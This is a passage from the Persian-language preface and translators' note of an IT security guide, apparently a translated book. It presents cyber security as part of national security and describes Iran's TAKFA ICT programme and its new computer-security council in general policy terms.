‫ﺑﺎﻭﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻫﻤﺎﻧﮕﻮﻧﻪ ﮐﻪ ﭘﻴﺪﺍﻳﺶ ﺧﻂ ﻭ ﮐﺘﺎﺑﺖ ﺁﻧﭽﻨﺎﻥ ﺗﺄﺛﻴﺮ ﺷﮕﺮﻓﻲ ﺑﺮ ﺳﺮﻧﻮﺷﺖ ﺍﻧﺴﺎﻥ ﺑﺮﺟﺎﻱ ﮔﺬﺍﺷﺘﻪ ﮐﻪ ﻣـﻮﺭﺧﻴﻦ‬
‫ﺭﺍ ﺑﺮﺁﻥ ﺩﺍﺷﺘﻪ ﺗﺎ ﺩﺍﺳﺘﺎﻥ ﺯﻧﺪﮔﻲ ﺑﺸﺮ ﺑﺮ ﺍﻳﻦ ﮐﺮﻩ ﺧﺎﮐﻲ ﺭﺍ ﺑﻪ ﺩﻭﺭﺍﻥ ﻣﺎ ﻗﺒﻞ ﺗﺎﺭﻳﺦ ﻭ ﺗـﺎﺭﻳﺦ ﺗﻘـﺴﻴﻢ ﻧﻤﺎﻳﻨـﺪ‪ ،‬ﻭﺭﻭﺩ ﺑـﻪ ﻓـﻀﺎﻱ ﻣﺠـﺎﺯﻱ‬
‫ﺣﺎﺻﻞ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﻧﻮﻳﻦ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﻴﺰ ﺩﻭﺭﺓ ﺟﺪﻳﺪﻱ ﺍﺯ ﺗﻤﺪﻥ ﺑﺸﺮﻱ ﺭﺍ ﺭﻗﻢ ﺯﺩﻩ‪ ،‬ﺑﻨﺤﻮﻱ ﻛﻪ ﺍﻧﻘﻼﺏ ﻋﺼﺮ ﺍﻃﻼﻋـﺎﺕ ﺷـﻴﻮﺓ‬
‫ﺍﻧﺪﻳﺸﻪ‪ ،‬ﺗﻮﻟﻴﺪ‪ ،‬ﻣﺼﺮﻑ‪ ،‬ﺗﺠﺎﺭﺕ‪ ،‬ﻣﺪﻳﺮﻳﺖ‪ ،‬ﺍﺭﺗﺒﺎﻁ‪ ،‬ﺟﻨﮓ ﻭ ﺣﺘﻲ ﺩﻳﻨﺪﺍﺭﻱ ﻭ ﻋﺸﻖﻭﺭﺯﻱ ﺭﺍ ﺩﮔﺮﮔﻮﻥ ﺳﺎﺧﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﺍﻳﻦ ﺗﺤﻮﻝ ﺑﺰﺭﮒ ﺍﻟﺰﺍﻣﺎﺕ ﻭ ﺗﺒﻌﺎﺕ ﻓﺮﺍﻭﺍﻧﻲ ﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺷﺘﻪ ﻛﻪ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﺁﻧﻬﺎ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻣﻔﺎﻫﻴﻢ ﻧﻮﻳﻦ ﺍﻣﻨﻴـﺖ ﻣﺠـﺎﺯﻱ ﻳـﺎ‬
‫ﺍﻣﻨﻴﺖ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺎ ﺗﻐﻴﻴﺮﻱ ﻛﻪ ﺩﺭ ﺍﻃﻼﻕ ﻋﺒﺎﺭﺕ "ﺷﺒﻜﺔ ﺭﺍﻳﺎﻧـﻪﺍﻱ" ﺍﺯ ﻳـﻚ ﺷـﺒﻜﺔ ﻛﻮﭼـﻚ ﻛـﺎﺭﮔﺮﻭﻫﻲ ﺑـﻪ ﺷـﺒﻜﻪﺍﻱ‬
‫ﮔﺴﺘﺮﺩﻩ ﻭ ﺟﻬﺎﻧﻲ )ﺍﻳﻨﺘﺮﻧﺖ( ﻭﺍﻗﻊ ﮔﺮﺩﻳﺪﻩ‪ ،‬ﻭ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺭﺷﺪ ﺭﻭﺯﺍﻓﺰﻭﻥ ﺗﻌﺎﻣﻼﺕ ﻭ ﺗﺒـﺎﺩﻻﺗﻲ ﻛـﻪ ﺭﻭﻱ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺻـﻮﺭﺕ‬
‫ﻣﻲﭘﺬﻳﺮﺩ‪ ،‬ﻧﻴﺎﺯ ﺑﻪ ﻧﻈﺎﻡﻫﺎﻱ ﺣﻔﺎﻇﺖ ﻭ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺟﻬﺖ ﺿﻤﺎﻧﺖ ﻣﺒﺎﺩﻻﺕ ﻭ ﺍﻳﺠﺎﺩ ﺗﻌﻬﺪ ﻗﺎﻧﻮﻧﻲ ﺑﺮﺍﻱ ﻃﺮﻓﻬﺎﻱ ﺩﺧﻴﻞ ﺩﺭ ﻣﺒﺎﺩﻟـﻪ‬
‫ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪ .‬ﻧﻈﺎﻡﻫﺎﻳﻲ ﻣﺸﺘﻤﻞ ﺑﺮ ﻗﻮﺍﻧﻴﻦ‪ ،‬ﺭﻭﺷﻬﺎ‪ ،‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺣﺘﻲ ﺍﺯ ﻋﻘﻮﺩ ﻣﺘﺪﺍﻭﻝ ﻭ ﺭﻭﺷﻬﺎﻱ ﺳﻨﺘﻲ ﺗﻌﻬﺪﺁﻭﺭﺗﺮ‬
‫ﺑﻮﺩﻩ ﻭ ﺿﻤﻨﹰﺎ ﺍﻣﻨﻴﺖ ﻭ ﺧﺼﻮﺻﻲ ﺑﻮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻣﺒﺎﺩﻟﻪﺷﺪﻩ ﺭﺍ ﺑﻴﺶ ﺍﺯ ﭘﻴﺶ ﺗﻀﻤﻴﻦ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﺤﻴﻂﻫﺎﻱ ﻣﺠﺎﺯﻱ ﻫﻤﻮﺍﺭﻩ ﺑﻌﻨﻮﺍﻥ ﻳﻜﻲ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﻭ ﺍﻟﺰﺍﻣﺎﺕ ﺍﺳﺎﺳـﻲ ﺩﺭ ﻛـﺎﺭﺑﺮﻱ ﺗﻮﺳـﻌﻪﺍﻱ ﻭ ﻓﺮﺍﮔﻴـﺮ ﺍﺯ‬
‫‪ ICT‬ﻣﻮﺭﺩ ﺗﺎﻛﻴﺪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﮔﺮﭼﻪ ﺍﻣﻨﻴﺖ ﻣﻄﻠﻖ ﭼﻪ ﺩﺭ ﻣﺤﻴﻂ ﻭﺍﻗﻌﻲ ﻭ ﭼﻪ ﺩﺭ ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ ﺩﺳﺖﻧﻴـﺎﻓﺘﻨﻲ ﺍﺳـﺖ‪ ،‬ﻭﻟـﻲ ﺍﻳﺠـﺎﺩ‬
‫ﺳﻄﺤﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻛﻪ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﻭ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﻧﻴﺎﺯﻫﺎ ﻭ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑﺎﺷﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﺗﻤﺎﻣﻲ ﺷﺮﺍﻳﻂ ﻣﺤﻴﻄـﻲ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ‬
‫ﺍﺳﺖ‪ .‬ﺗﻨﻬﺎ ﺑﺎ ﻓﺮﺍﻫﻢ ﺑﻮﺩﻥ ﭼﻨﻴﻦ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ ﺍﺳﺖ ﻛﻪ ﺍﺷﺨﺎﺹ ﺣﻘﻴﻘﻲ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ‪ ،‬ﺷﺮﻛﺘﻬﺎﻱ ﺧـﺼﻮﺻﻲ ﻭ ﺍﺭﮔﺎﻧﻬـﺎﻱ ﺩﻭﻟﺘـﻲ ﺿـﻤﻦ‬
‫ﻻ ﻫﻴﭽﮕـﺎﻩ ﻳﻜـﺪﻳﮕﺮ ﺭﺍ ﻧﺪﻳـﺪﻩ ﻭ‬
‫ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻪ ﻃﺮﻓﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﻛﻪ ﻫﻤﮕﻲ ﺩﺭ ﻳﻚ ﺗﺒﺎﺩﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺧﻴﻞ ﻫﺴﺘﻨﺪ ﻭ ﺍﺣﺘﻤـﺎ ﹰ‬
‫ﻧﻤﻲﺷﻨﺎﺳﻨﺪ‪ ،‬ﻧﻘﺶ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﺧﻮﺩ ﺑﻌﻨﻮﺍﻥ ﮔﺮﻩﺍﻱ ﻣﺆﺛﺮ ﺍﺯ ﺍﻳﻦ ﺷﺒﻜﻪ ﻣﺘﻌﺎﻣﻞ ﻭ ﻫﻢﺍﻓﺰﺍ ﺭﺍ ﺍﻳﻔﺎ ﺧﻮﺍﻫﻨﺪ ﻧﻤﻮﺩ‪.‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻤﻦ ﺑﻮﺩﻥ ﺳﺮﻣﺎﻳﻪ ﻫﺎﯼ ﺍﻃﻼﻋﺎﺗﯽ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﺯﻳﺮﺳﺎﺧﺘﻲ ﻛﺸﻮﺭ ﮔﺬﺷﺘﻪ ﺍﺯ ﺍﺑﻌـﺎﺩ ﮔـﺴﺘﺮﺩﻩ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ‪ ،‬ﮐﻠﻴـﺪ ﻗﻔـﻞ‬
‫ﻓﺮﺻﺘﻬﺎﯼ ﺑﯽﺷﻤﺎﺭ ﺗﺠﺎﺭﯼ ﻭ ﻏﻴﺮﺗﺠﺎﺭﯼ ﺟﺪﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﯽ ﺍﺳﺖ‪ .‬ﺁﻧﭽﻪ ﻣﺴﻠﻢ ﺍﺳﺖ ﭼـﺎﻟﺶ ﺍﻣﻨﻴﺘـﯽ ﺭﻭﺩﺭﺭﻭﻱ ﻛـﺸﻮﺭ ﻋـﺪﻡ ﺩﺳﺘﺮﺳـﯽ ﺑـﻪ‬
‫ﻓﻨﺎﻭﺭﻱ ﻭ ﻳﺎ ﻋﺪﻡ ﻭﺟﻮﺩ ﻣﺤﺼﻮﻻﺕ ﺍﻣﻨﻴﺘﯽ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﮑﻪ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ‪ ،‬ﻓﺮﻫﻨﮓﺳﺎﺯﻱ‪ ،‬ﺑﻬﺮﻩﻭﺭﻱ ﻣﻨﺎﺳﺐ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﻮﺟﻮﺩ ﻭ ﻧﻴﺰ ﺳﺎﺯﮔﺎﺭﯼ‬
‫ﺁﻧﻬﺎ ﺑﻪ ﮔﻮﻧﻪﺍﯼ ﺍﺳﺖ ﮐﻪ ﻧﻴﺎﺯ ﻣﻨﺤﺼﺮﺑﻪﻓﺮﺩ ﺷﺒﮑﻪ ﻭ ﻓﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛﺸﻮﺭ ﺭﺍ ﺗﺄﻣﻴﻦ ﮐﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﺭﺍﺳﺘﺎ ﺗﻮﺟﻪ ﺑـﻪ ﺍﻳـﻦ ﻧﻜﺘـﻪ ﺿـﺮﻭﺭﻱ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٨‬‬

‫ﺍﺳﺖ ﻛﻪ ﻣﻌﻤﺎﺭﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺁﻳﻨﺪﻱ ﺍﺯ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺟﺎﺭﻱ ﺩﺭ ﻣﻌﻤـﺎﺭﻱ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺳـﻄﻮﺡ ﻣﺨﺘﻠـﻒ ﺍﻋـﻢ ﺍﺯ ﻣﻠـﻲ ﻭ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﺑﻪ ﺗﻨﺎﺳﺐ ﻭ ﻧﻴﺎﺯ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻻﺯﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﻧﻜﺘﺔ ﻣﻬﻢ ﺩﻳﮕﺮ ﺣﺎﺻﻞ ﺍﺯ ﺗﺠـﺎﺭﺏ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﭘﻴﺸﺮﻭ ﺣﺎﻛﻲ ﺍﺳﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺴﺄﻟﻪﺍﻱ ﻓﺮﺍﺑﺨﺸﻲ ﺍﺳﺖ ﻭ ﻧﻴﺎﺯ ﺑﻪ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﮔﺴﺘﺮﺩﻩ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﻫﻤﻜﺎﺭﻳﻬﺎ ﻫـﻢ‬
‫ﺩﺭ ﺳﻄﺢ ﻣﻠﻲ ﻭ ﻫﻢ ﺩﺭ ﺳﻄﺢ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺗﻌﻴﻴﻦ ﻧﻘﺸﻬﺎ‪ ،‬ﻭﻇﺎﻳﻒ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺍﺯ ﻧﻜﺎﺕ ﻣﻬﻤﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺍﻳﻦ‬
‫ﻫﻤﻜﺎﺭﻳﻬﺎ ﺑﺎﻳﺪ ﺗﻌﺮﻳﻒ ﺷﻮﻧﺪ‪.‬‬
‫ﺍﻣﺮﻭﺯﻩ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻭﺟﻪ ﺗﺎﺯﻩﺍﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﻫﺮ ﻛﺸﻮﺭ ﺭﺍ ﺑﻪ ﺗﺼﻮﻳﺮ ﻣﻲﻛﺸﺪ‪ .‬ﺍﻣﻴﺪ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﻣﻮﺍﺯﺍﺕ ﺗﻮﺳﻌﻪ ﺳـﺮﻳﻊ‬
‫ﻛﺎﺭﺑﺮﻱﻫﺎﻱ ﮔﻮﻧﺎﮔﻮﻥ ﻓﻨﺎﻭﺭﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺯﻳﺮﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺭ ﭘﻮﺷﺶ ﺑﺮﻧﺎﻣﺔ ﺗﻜﻔﺎ‪ ،‬ﺑﺎ ﺷﻨﺎﺧﺖ ﻭ ﺗﻌﻴﻴﻦ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬
‫ﻛﻠﻴﺪﻱ ﻛﺸﻮﺭ ﻛﻪ ﻭﺍﺑﺴﺘﮕﻲ ﺣﻴﺎﺗﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺭﻧﺪ ﻭ ﺳﭙﺲ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ‪ ،‬ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻭ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳـﻦ‬
‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎ‪ ،‬ﻣﺴﻴﺮ ﺗﻮﺳﻌﺔ ﻫﻤﻪﺟﺎﻧﺒﺔ ﻛﺸﻮﺭ ﺩﺭ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺟﺎﻣﻌﺔ ﺩﺍﻧﺎﻳﻲﻣﺤﻮﺭ ﻫﻤﻮﺍﺭ ﮔﺮﺩﺩ‪.‬‬
‫ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺩﺭ ﻃﻲ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻭ ﭘﺲ ﺍﺯ ﺗﺼﻮﻳﺐ ﺑﺮﻧﺎﻣﺔ ﺗﻮﺳﻌﺔ ﻭ ﻛﺎﺭﺑﺮﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ )ﺗﻜﻔﺎ( ﺩﺭ ﻫﻴـﺄﺕ ﺩﻭﻟـﺖ‬
‫ﻛﻪ ﻧﺸﺎﻥ ﺍﺯ ﺗﻮﺟﻪ ﻭ ﺑﻴﻨﺶ ﻣﺪﻳﺮﻳﺖ ﺍﺭﺷﺪ ﻛﺸﻮﺭ ﺩﺭ ﺭﻭﻳﻜﺮﺩ ﻧﻮﻳﻦ ﺑﻪ ﺗﻮﺳﻌﻪ ﻛﺸﻮﺭ ﺩﺍﺷـﺘﻪ‪ ،‬ﻣﻄﺎﻟﻌـﺎﺕ ﻭ ﺑﺮﺭﺳـﻴﻬﺎﻱ ﻓﻨـﻲ ﺑـﺮﺍﻱ ﺗﻤﻬﻴـﺪ‬
‫ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﺤﻴﻂﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﻏﺎﺯ ﺷﺪﻩ ﻭ ﺭﺷﺪ ﺳﺮﻳﻌﻲ ﻳﺎﻓﺘﻪ ﺍﺳـﺖ‪ .‬ﻧﺘـﺎﻳﺞ ﻣﻄﺎﻟﻌـﺎﺕ ﻛـﺎﺭﮔﺮﻭﻩ ﻣـﺮﺗﺒﻂ‪ ،‬ﻣﻨﺠـﺮ ﺑـﻪ‬
‫ﺷﻨﺎﺧﺖ ﺯﻣﻴﻨﻪﻫﺎﻱ ﻭﺳﻴﻌﺘﺮ ﻧﻴﺎﺯ ﮔﺮﺩﻳﺪ ﻭ ﺑﺮ ﺍﻳﻦ ﺍﺳﺎﺱ ﺑﺎ ﺗﺼﻮﻳﺐ ﻫﻴﺄﺕ ﻣﺤﺘﺮﻡ ﺩﻭﻟﺖ ﻭ ﺭﺋﻴﺲ ﻣﺤﺘﺮﻡ ﺟﻤﻬـﻮﺭ‪ ،‬ﺷـﻮﺭﺍﻱﻋـﺎﻟﻲ ﺍﻣﻨﻴـﺖ‬
‫ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻛﺸﻮﺭ ﺑﺎ ﻣﺴﺌﻮﻟﻴﺖ ﻣﻌﺎﻭﻥ ﺍﻭﻝ ﻣﺤﺘﺮﻡ ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ ﺁﻏﺎﺯ ﺑﻪ ﻛﺎﺭ ﻛﺮﺩﻩ ﺍﺳﺖ ﻭ ﺍﻧﺸﺎﺍﷲ ﺑﺰﻭﺩﻱ ﻧﺘﺎﻳﺞ ﺑﺮﺭﺳﻴﻬﺎ‬
‫ﻭ ﺗﺼﻤﻴﻤﺎﺕ ﺩﺭ ﻗﺎﻟﺐ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﻭ ﺳﻨﺪ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﺸﻮﺭ ﺍﻋﻼﻡ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺩﺑﻴﺮﺧﺎﻧﺔ ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﺩﺭ ﺍﺩﺍﻣﺔ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺗﻼﺵ ﺩﺍﺭﺩ ﺗﺎ ﺑﺎ ﺗﻬﻴـﻪ‪ ،‬ﺗﺮﺟﻤـﻪ ﻭ ﺗـﺄﻟﻴﻒ ﻣﻄﺎﻟـﺐ ﻓﻨـﻲ ﺩﺭ ﻣﺤـﻴﻂ‬
‫ﻣﻨﺎﺳﺐ ﻧﺴﺒﺖ ﺑﻪ ﺗﻘﻮﻳﺖ ﺩﺍﻧﺶ ﻣﻮﺟﻮﺩ ﻛﺸﻮﺭ ﺩﺭ ﻗﻠﻤﺮﻭﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻗﺪﺍﻡ ﻧﻤﺎﻳﺪ‪ .‬ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﺍﺯ ﺟﻤﻠﻪ ﺍﺳﻨﺎﺩ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ‪ ،‬ﺟـﺎﻣﻊ‬
‫ﻭ ﻣﺘﺄﺧﺮ ﺩﺭ ﻗﻠﻤﺮﻭ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ‪ ICT‬ﻛﺸﻮﺭ ﻫﺪﻳﻪ ﻣﻲﮔﺮﺩﺩ‪.‬‬

‫ﻧﺼﺮﺍﷲ ﺟﻬﺎﻧﮕﺮﺩ‬
‫ﺩﺑﻴﺮ ﺷﻮﺭﺍﻱﻋﺎﻟﻲ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﻭ‬
‫ﻧﻤﺎﻳﻨﺪﻩ ﻭﻳﮋﻩ ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ‬
‫ﻳﺎﺩﺩﺍﺷﺖ ﻣﺘﺮﺟﻤﻴﻦ‬

‫ﺍﺳﺘﻔﺎﺩﺓ ﺩﺭﺳﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺻﺤﻴﺢ‪ ،‬ﻳﻜﻲ ﺍﺯ ﻧﻴﺎﺯﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ ﺍﻫـﺪﺍﻑ ﺳـﺎﺯﻣﺎﻧﻲ ﺍﺳـﺖ ﻭ ﻗﺎﺑﻠﻴـﺖ‬
‫ﺍﻃﻤﻴﻨﺎﻥ‪ ،‬ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺍﺯ ﻣﺸﺨﺼﻪﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺩﺭ ﮐـﺎﺭﺁﻳﻲ ﺁﻧﻬـﺎ ﻫـﺴﺘﻨﺪ‪ .‬ﻣﺰﺍﻳـﺎﻱ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﮐﺎﺭﺑﺮﺩ ﻭﺳﻴﻊ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺍﻫﺪﺍﻑ ﺗﺠﺎﺭﻱ ﺭﺍ ﻧـﺎﮔﺰﻳﺮ ﮐـﺮﺩﻩ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ ﺑـﻮﻳﮋﻩ‬
‫ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺗﻐﻴﻴﺮﺍﺕ ﺍﺳﺎﺳﻲ ﺭﺍ ﺩﺭ ﺭﻭﻧﺪ ﻛﺴﺐ ﻭ ﻛﺎﺭ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﻭ ﺑﺎﻋﺚ ﺷﺪﻩ ﮐﻪ ﺣﺠﻢ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻳﻚ ﺳـﺮ‬
‫ﺍﻧﮕﺸﺖ ﺑﺎ ﻣﺎ ﻓﺎﺻﻠﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ؛ ﻭ ﻧﺎﮔﻔﺘﻪ ﭘﻴﺪﺍ ﺍﺳﺖ ﮐﻪ ﺩﺭ ﺍﻳـﻦ ﻣﺤـﻴﻂ ﭘﻴﭽﻴـﺪﻩ ﺑـﺎ ﺍﻳـﻦ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭﺳـﻴﻊ‪ ،‬ﻣﺨـﺎﻃﺮﺍﺕ ﮔـﺴﺘﺮﺩﻩﺍﻱ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ‪ ،‬ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻭ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻬﺪﻳﺪ ﻣﻲﮐﻨﻨﺪ‪.‬‬
‫ﺩﺭ ﺩﻧﻴﺎﻱ ﺍﻣﺮﻭﺯ‪ ،‬ﺍﻋﺘﺒﺎﺭﺍﺕ ﻣﺎﻟﻲ ﺑﻴﺸﺘﺮ ﻭ ﺑﻴﺸﺘﺮ ﺑﺼﻮﺭﺕ ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ﺟﺎﺑﺠﺎ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻣﺨﺘﻠﻒ ﺑﺎ ﺣﺴﺎﺳﻴﺘﻬﺎﻱ ﮐﻢ ﻭ ﺯﻳـﺎﺩ‬
‫ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﮑﻪﻫﺎ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺳﺎﻣﺎﻧﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎ ﺳﺮﻋﺖ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﭘﻴﭽﻴﺪﻩﺗﺮ ﻭ ﻣﺮﺗﺒﻂﺗﺮ ﺑـﺎ ﺩﻧﻴـﺎﻱ ﺑﻴﺮﻭﻧـﻲ ﻣـﻲﮔﺮﺩﻧـﺪ‪ ،‬ﻭ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺳﺎﺩﺓ ﻧﻔﻮﺫ ﻭ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺑﻴﺶ ﺍﺯ ﻫﺮ ﺯﻣﺎﻥ ﺩﻳﮕﺮﻱ ﺩﺭ ﺩﺳﺘﺮﺱ ﻣﺎﺟﺮﺍﺟﻮﻳﺎﻥ ﻭ ﺟﻨﺎﻳﺘﮑﺎﺭﺍﻥ ﺩﻧﻴﺎﻱ ﻣﺠﺎﺯﻱ ﻗﺮﺍﺭ‬
